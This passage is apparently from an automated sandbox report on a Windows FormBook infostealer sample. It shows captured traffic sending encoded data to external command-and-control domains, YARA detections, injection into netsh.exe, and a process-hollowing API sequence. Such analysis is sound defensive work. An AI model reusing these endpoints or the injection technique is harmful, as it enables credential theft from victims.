                                                                                                    May 2, 2024 08:27:51.868494987 CEST | 440 | OUT | GET /0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=nRUqMZh05AeT5XBXy6tvbUigcs6hc4rC+kK/un5r26ew8GYnMJKxFmClF8lXwwqE5TFZd2gxpf2h1MF48x8mm8dpDB1BgTHqwJGV3u14y6bwQsvyQrq4dK8= HTTP/1.1
                                                                                                    Host: www.cucuzeus88.store
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    Connection: close
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                                    May 2, 2024 08:27:52.211432934 CEST | 1217 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                    Connection: close
                                                                                                    content-type: text/html
                                                                                                    content-length: 795
                                                                                                    date: Thu, 02 May 2024 06:27:52 GMT
                                                                                                    server: LiteSpeed
                                                                                                    location: https://www.cucuzeus88.store/0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=nRUqMZh05AeT5XBXy6tvbUigcs6hc4rC+kK/un5r26ew8GYnMJKxFmClF8lXwwqE5TFZd2gxpf2h1MF48x8mm8dpDB1BgTHqwJGV3u14y6bwQsvyQrq4dK8=
                                                                                                    platform: hostinger
                                                                                                    content-security-policy: upgrade-insecure-requests
                                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    41 | 192.168.2.4 | 49778 | 101.99.93.157 | 80 | 916 | C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    May 2, 2024 08:27:57.835331917 CEST | 708 | OUT | POST /0hhg/ HTTP/1.1
                                                                                                    Host: www.bnbuotqakx.shop
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    Origin: http://www.bnbuotqakx.shop
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Cache-Control: max-age=0
                                                                                                    Content-Length: 205
                                                                                                    Referer: http://www.bnbuotqakx.shop/0hhg/
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                                    Data Ascii: ABqDW6A8=iksK46TIg+OsqOC+GuKUFec+mv33r1XHGce/TxSIL/ipblunTc/NXD6W5qfB+8DaMPzIro+FjAAzlexdjwYDwtbV12BrmzVTS0nL1DzDkp7xp/XFPw3/G4seFepkvFI79w5hPVzTZwGgIJgx7cMsmEF2QLVYe1Jwndbn1hUk3fm/6gp6Ynm130uaS/IYdY5PyA==
May 2, 2024 08:27:58.029414892 CEST  536                IN         HTTP/1.1 404 Not Found
                                                                                                    Server: nginx
                                                                                                    Date: Thu, 02 May 2024 06:27:57 GMT
                                                                                                    Content-Type: text/html
                                                                                                    Content-Length: 548
                                                                                                    Connection: close
                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome frie
May 2, 2024 08:27:58.029445887 CEST  155                IN
                                                                                                    Data Ascii: ndly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
42          192.168.2.4  49779        101.99.93.157   80                916  C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
Timestamp                            Bytes transferred  Direction  Data
May 2, 2024 08:28:01.684062958 CEST  728                OUT        POST /0hhg/ HTTP/1.1
                                                                                                    Host: www.bnbuotqakx.shop
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    Origin: http://www.bnbuotqakx.shop
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Cache-Control: max-age=0
                                                                                                    Content-Length: 225
                                                                                                    Referer: http://www.bnbuotqakx.shop/0hhg/
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                                    Data Ascii: ABqDW6A8=iksK46TIg+Osruy+BJWUUuc97f33lVXDGcS/T0/NLNGpbEenSeXNaj6WyKfEhsDEMPP+rqqFjAUzla1dgBYAy9bXgmBp5jVTS0nL1HSmkpjxpOHFOR38YotsM+pkrFI/9w5DPUv5ZyOgINox4OkjtEFserUuYmQfm/Sc2yEr48fcyG4gJWHil0KpP4BsQbEGpPyNSWDylG9D8ddUiJEIhWg=
May 2, 2024 08:28:01.877952099 CEST  536                IN         HTTP/1.1 404 Not Found
                                                                                                    Server: nginx
                                                                                                    Date: Thu, 02 May 2024 06:28:01 GMT
                                                                                                    Content-Type: text/html
                                                                                                    Content-Length: 548
                                                                                                    Connection: close
                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome frie
May 2, 2024 08:28:01.878011942 CEST  155                IN
                                                                                                    Data Ascii: ndly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID  Source IP    Source Port  Destination IP  Destination Port
43          192.168.2.4  49780        101.99.93.157   80
Timestamp                            Bytes transferred  Direction  Data
May 2, 2024 08:28:04.745999098 CEST  7734               OUT        POST /0hhg/ HTTP/1.1
                                                                                                    Host: www.bnbuotqakx.shop
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    Origin: http://www.bnbuotqakx.shop
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Cache-Control: max-age=0
                                                                                                    Content-Length: 10305
                                                                                                    Referer: http://www.bnbuotqakx.shop/0hhg/
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
Data Ascii: ABqDW6A8= [TRUNCATED]
May 2, 2024 08:28:04.940349102 CEST  536                IN         HTTP/1.1 404 Not Found
                                                                                                    Server: nginx
                                                                                                    Date: Thu, 02 May 2024 06:28:04 GMT
                                                                                                    Content-Type: text/html
                                                                                                    Content-Length: 548
                                                                                                    Connection: close
                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome frie
May 2, 2024 08:28:04.940395117 CEST  155                IN
                                                                                                    Data Ascii: ndly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
May 2, 2024 08:28:04.943573952 CEST  3076               OUT
                                                                                                    Data Ascii: RGDTQDEx5SI5zuFGaGU6bZOteWVWu3zj8Fk2sXV8X2aUAZDOs484fO0PSD3YI5SfDsUHTQ2VtuABEoBwVm04v4s54rtaeNkLXx7U2zkKFAzcSU90jTGzG6W3ziW04EpPw7PffrYD4bG7APW37F8uYCNxfyHk/xuKeE7ZtzoHBBk0H0V35C/PT3ZOlXXrT8vT2dgCml/D9kNCei14taXXXfZY5Q9aw6i5/yPaXAfpq357qJ3ho43


                                                                                                    Target ID:0
                                                                                                    Start time:08:23:52
                                                                                                    Start date:02/05/2024
                                                                                                    Path:C:\Users\user\Desktop\yZcecBUXN7.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Users\user\Desktop\yZcecBUXN7.exe"
                                                                                                    Imagebase:0x6d0000
                                                                                                    File size:631'808 bytes
                                                                                                    MD5 hash:9CD48F0D93C28AE6559409DE23414554
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: MALWARE_Win_DLInjector02, Description: Detects downloader injector, Source: 00000000.00000002.1627462031.0000000005140000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                    Reputation:low
                                                                                                    Has exited:true

                                                                                                    Target ID:1
                                                                                                    Start time:08:23:52
                                                                                                    Start date:02/05/2024
                                                                                                    Path:C:\Users\user\Desktop\yZcecBUXN7.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Users\user\Desktop\yZcecBUXN7.exe"
                                                                                                    Imagebase:0x690000
                                                                                                    File size:631'808 bytes
                                                                                                    MD5 hash:9CD48F0D93C28AE6559409DE23414554
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1897755674.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1897755674.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1898683610.0000000001020000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1898683610.0000000001020000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1899804288.0000000001640000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1899804288.0000000001640000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                    Reputation:low
                                                                                                    Has exited:true

                                                                                                    Target ID:2
                                                                                                    Start time:08:24:07
                                                                                                    Start date:02/05/2024
                                                                                                    Path:C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe"
                                                                                                    Imagebase:0x40000
                                                                                                    File size:140'800 bytes
                                                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.4123873184.0000000002960000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.4123873184.0000000002960000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                                    Reputation:high
                                                                                                    Has exited:false

                                                                                                    Target ID:4
                                                                                                    Start time:08:24:12
                                                                                                    Start date:02/05/2024
                                                                                                    Path:C:\Windows\SysWOW64\netsh.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Windows\SysWOW64\netsh.exe"
                                                                                                    Imagebase:0x1560000
                                                                                                    File size:82'432 bytes
                                                                                                    MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4122807420.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4122807420.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4123925036.0000000001320000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4123925036.0000000001320000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4123058161.0000000000F00000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4123058161.0000000000F00000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                    Reputation:moderate
                                                                                                    Has exited:false

                                                                                                    Target ID:7
                                                                                                    Start time:08:24:27
                                                                                                    Start date:02/05/2024
                                                                                                    Path:C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe"
                                                                                                    Imagebase:0x40000
                                                                                                    File size:140'800 bytes
                                                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4125352041.00000000055B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.4125352041.00000000055B0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                    Reputation:high
                                                                                                    Has exited:false

                                                                                                    Target ID:8
                                                                                                    Start time:08:24:50
                                                                                                    Start date:02/05/2024
                                                                                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                    Imagebase:0x7ff72bec0000
                                                                                                    File size:676'768 bytes
                                                                                                    MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true


                                                                                                      Execution Graph

                                                                                                      Execution Coverage:3.6%
                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                      Signature Coverage:0%
                                                                                                      Total number of Nodes:21
                                                                                                      Total number of Limit Nodes:1
                                                                                                      execution_graph 11892 ccb988 ReadProcessMemory 11893 ccba47 11892->11893 11898 cca4d8 11899 cca521 Wow64SetThreadContext 11898->11899 11901 cca599 11899->11901 11902 cca758 11903 cca79c VirtualAllocEx 11902->11903 11905 cca814 11903->11905 11906 ccb558 11907 ccb5e5 CreateProcessW 11906->11907 11909 ccb73e 11907->11909 11910 cca878 11911 cca8bc ResumeThread 11910->11911 11913 cca908 11911->11913 11914 ccb878 11915 ccb8eb Wow64GetThreadContext 11914->11915 11916 ccb8d6 11914->11916 11917 ccb934 11915->11917 11916->11915 11894 cca600 11895 cca64c WriteProcessMemory 11894->11895 11897 cca6e5 11895->11897

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 30 ccb558-ccb5e3 31 ccb5fa-ccb608 30->31 32 ccb5e5-ccb5f7 30->32 33 ccb61f-ccb65b 31->33 34 ccb60a-ccb61c 31->34 32->31 35 ccb65d-ccb66c 33->35 36 ccb66f-ccb73c CreateProcessW 33->36 34->33 35->36 40 ccb73e-ccb744 36->40 41 ccb745-ccb804 36->41 40->41 51 ccb83a-ccb845 41->51 52 ccb806-ccb82f 41->52 52->51
                                                                                                      APIs
                                                                                                      • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00CCB729
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1626319190.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_cc0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateProcess
                                                                                                      • String ID:
                                                                                                      • API String ID: 963392458-0
                                                                                                      • Opcode ID: 8db3ff95fa51076e529ac150582e44590c95cea2cd39a720463863891d0c6400
                                                                                                      • Instruction ID: ccd203f0e7d500f85f1386c73d68284faed00b3b0a6dca8c47b2b51f869d5dde
                                                                                                      • Opcode Fuzzy Hash: 8db3ff95fa51076e529ac150582e44590c95cea2cd39a720463863891d0c6400
                                                                                                      • Instruction Fuzzy Hash: 5581CF74C00269DFDB21CFA9C980BDDBBF5AB49304F1491AAE508B7260DB749E89CF54
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 56 cca600-cca66b 58 cca66d-cca67f 56->58 59 cca682-cca6e3 WriteProcessMemory 56->59 58->59 61 cca6ec-cca73e 59->61 62 cca6e5-cca6eb 59->62 62->61
                                                                                                      APIs
                                                                                                      • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00CCA6D3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1626319190.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_cc0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MemoryProcessWrite
                                                                                                      • String ID:
                                                                                                      • API String ID: 3559483778-0
                                                                                                      • Opcode ID: 63cfb0788624558b9ed383e01d572d66366fed996d1bdf3105c0e3e3effa2091
                                                                                                      • Instruction ID: 29a941f7ae8806c197e0da43b5cfbab1ea07dedaf02ecfda813a7c2fcf6565ce
                                                                                                      • Opcode Fuzzy Hash: 63cfb0788624558b9ed383e01d572d66366fed996d1bdf3105c0e3e3effa2091
                                                                                                      • Instruction Fuzzy Hash: 6D4198B5D012589FCF00CFA9D984ADEFBF1BB49314F24902AE818B7210D738AA45CB64
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 67 cca758-cca812 VirtualAllocEx 70 cca81b-cca865 67->70 71 cca814-cca81a 67->71 71->70
                                                                                                      APIs
                                                                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00CCA802
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1626319190.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_cc0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AllocVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 4275171209-0
                                                                                                      • Opcode ID: 100dc572ef192e8f94ef061eb17e78fb1aba6cdc76a73624edb069455b58e12f
                                                                                                      • Instruction ID: 1abd6c7d0f3f22e83a0afa4686312683be212b9a7aeadd21d4dca5fdb9e3f80f
                                                                                                      • Opcode Fuzzy Hash: 100dc572ef192e8f94ef061eb17e78fb1aba6cdc76a73624edb069455b58e12f
                                                                                                      • Instruction Fuzzy Hash: F33186B9D00258DFCF10CFA9D984ADEFBB1BB49320F10942AE815B7250D735A946CF69
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 76 ccb988-ccba45 ReadProcessMemory 77 ccba4e-ccba8c 76->77 78 ccba47-ccba4d 76->78 78->77
                                                                                                      APIs
                                                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00CCBA35
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1626319190.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_cc0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MemoryProcessRead
                                                                                                      • String ID:
                                                                                                      • API String ID: 1726664587-0
                                                                                                      • Opcode ID: 6ee1b263f37700fa47de9ff7e5978bc041b2ea4546625e34e237bfbfda053ab3
                                                                                                      • Instruction ID: 6a9a9f4adb65fc7ffeb9af746eb49fce00b58ec886a3ecfcc0931e3567dc487b
                                                                                                      • Opcode Fuzzy Hash: 6ee1b263f37700fa47de9ff7e5978bc041b2ea4546625e34e237bfbfda053ab3
                                                                                                      • Instruction Fuzzy Hash: D53187B9D04258DFCF10CFAAD984ADEFBB1BB19310F10A02AE814B7210D335A945CF64
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 81 cca4d8-cca538 83 cca54f-cca597 Wow64SetThreadContext 81->83 84 cca53a-cca54c 81->84 86 cca599-cca59f 83->86 87 cca5a0-cca5ec 83->87 84->83 86->87
                                                                                                      APIs
                                                                                                      • Wow64SetThreadContext.KERNEL32(?,?), ref: 00CCA587
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1626319190.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_cc0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ContextThreadWow64
                                                                                                      • String ID:
                                                                                                      • API String ID: 983334009-0
                                                                                                      • Opcode ID: f41dff7ee8740dc2bdb8cca13314cdf8686d8d30dd83fb9259e3658b2a90d8c0
                                                                                                      • Instruction ID: b836e9bd9f9efd616cf0d3842eef30acfb30ba64e53f9133edb23ab328f6b201
                                                                                                      • Opcode Fuzzy Hash: f41dff7ee8740dc2bdb8cca13314cdf8686d8d30dd83fb9259e3658b2a90d8c0
                                                                                                      • Instruction Fuzzy Hash: 0C31BCB4D00258DFCB10CFAAD984AEEFBF1BB49314F24802AE414B7240D738A985CF54
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 92 ccb878-ccb8d4 93 ccb8eb-ccb932 Wow64GetThreadContext 92->93 94 ccb8d6-ccb8e8 92->94 95 ccb93b-ccb973 93->95 96 ccb934-ccb93a 93->96 94->93 96->95
                                                                                                      APIs
                                                                                                      • Wow64GetThreadContext.KERNEL32(?,?), ref: 00CCB922
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1626319190.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_cc0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ContextThreadWow64
                                                                                                      • String ID:
                                                                                                      • API String ID: 983334009-0
                                                                                                      • Opcode ID: 5e36c41487fbd7e9f3f5e0343be5ad7d4262e17a042041ea6de7a2a07bffa385
                                                                                                      • Instruction ID: d528f164df3edebd0de586bf0055c5d71242c801f4abdd421e36d4db93cb2dae
                                                                                                      • Opcode Fuzzy Hash: 5e36c41487fbd7e9f3f5e0343be5ad7d4262e17a042041ea6de7a2a07bffa385
                                                                                                      • Instruction Fuzzy Hash: D2319AB5D012589FCB10CFAAD584ADEFBF1BB49314F24902AE418B7250D378AA45CF64
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 99 cca878-cca906 ResumeThread 102 cca90f-cca951 99->102 103 cca908-cca90e 99->103 103->102
                                                                                                      APIs
                                                                                                      • ResumeThread.KERNELBASE(?), ref: 00CCA8F6
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1626319190.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_cc0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ResumeThread
                                                                                                      • String ID:
                                                                                                      • API String ID: 947044025-0
                                                                                                      • Opcode ID: eb1ddca9abfcdbccdcedac654a3dabdea9479d5f0d17eb8aefb881e8031a3149
                                                                                                      • Instruction ID: db926c7d17c1086e2dd6d84c226b8b2d1b9a8c8c0b72c76099c371c9b842a4c3
                                                                                                      • Opcode Fuzzy Hash: eb1ddca9abfcdbccdcedac654a3dabdea9479d5f0d17eb8aefb881e8031a3149
                                                                                                      • Instruction Fuzzy Hash: 3631CAB4D012189FCB10CFAAD985ADEFBF4AB49324F10942AE815B7310C735A941CF98
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 182 c1d4cc-c1d4de 183 c1d572-c1d579 182->183 184 c1d4e4 182->184 185 c1d4e6-c1d4f2 183->185 184->185 186 c1d4f8-c1d51a 185->186 187 c1d57e-c1d583 185->187 189 c1d588-c1d59d 186->189 190 c1d51c-c1d53a 186->190 187->186 194 c1d554-c1d55c 189->194 192 c1d542-c1d552 190->192 192->194 195 c1d5aa 192->195 196 c1d59f-c1d5a8 194->196 197 c1d55e-c1d56f 194->197 196->197
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1626157109.0000000000C1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C1D000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_c1d000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 686b1430ec6a11f4fccae35e1837bbd1a27679ca0843163e1e8828ffa40784c0
                                                                                                      • Instruction ID: 100af5a1e82c056960864ab95543ee4491d61d7b53c9d5e7a601d14783a5d04e
                                                                                                      • Opcode Fuzzy Hash: 686b1430ec6a11f4fccae35e1837bbd1a27679ca0843163e1e8828ffa40784c0
                                                                                                      • Instruction Fuzzy Hash: 212149B1504200DFDB05DF14D9C0B67BF66FB99318F30C569E90A0B256C33AD996EBA1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1626157109.0000000000C1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C1D000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_c1d000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                      • Instruction ID: 17d17a5cd5ff27067f93da6bdfa285bb326559964eba69056a429b6813d20807
